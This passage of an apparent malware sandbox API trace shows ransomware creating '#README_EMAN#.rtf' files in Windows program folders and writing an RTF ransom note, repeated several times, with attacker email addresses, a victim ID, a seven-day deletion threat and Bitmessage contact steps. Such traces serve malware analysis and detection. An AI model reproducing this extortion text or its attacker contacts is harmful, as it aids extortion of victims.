nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n0>5\x1d:\x1b\x1b\x0f\x0f.%\"'$\x12\x12&'%$\x0f\x1bC3\n", lpUsedDefaultChar=0x0) returned 8717 [0208.178] WriteFile (in: hFile=0x2fc, lpBuffer=0x1f4da18*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1f4da18*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0208.179] CloseHandle (hObject=0x2fc) returned 1 [0208.179] GetFileAttributesW (lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\#README_EMAN#.rtf" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\#readme_eman#.rtf")) returned 0xffffffff [0208.179] GetLastError () returned 0x2 [0208.179] CreateFileW (lpFileName="C:\\Program Files\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\#README_EMAN#.rtf" (normalized: "c:\\program files\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2fc [0208.510] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0208.510] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0208.510] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1f4da18, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w 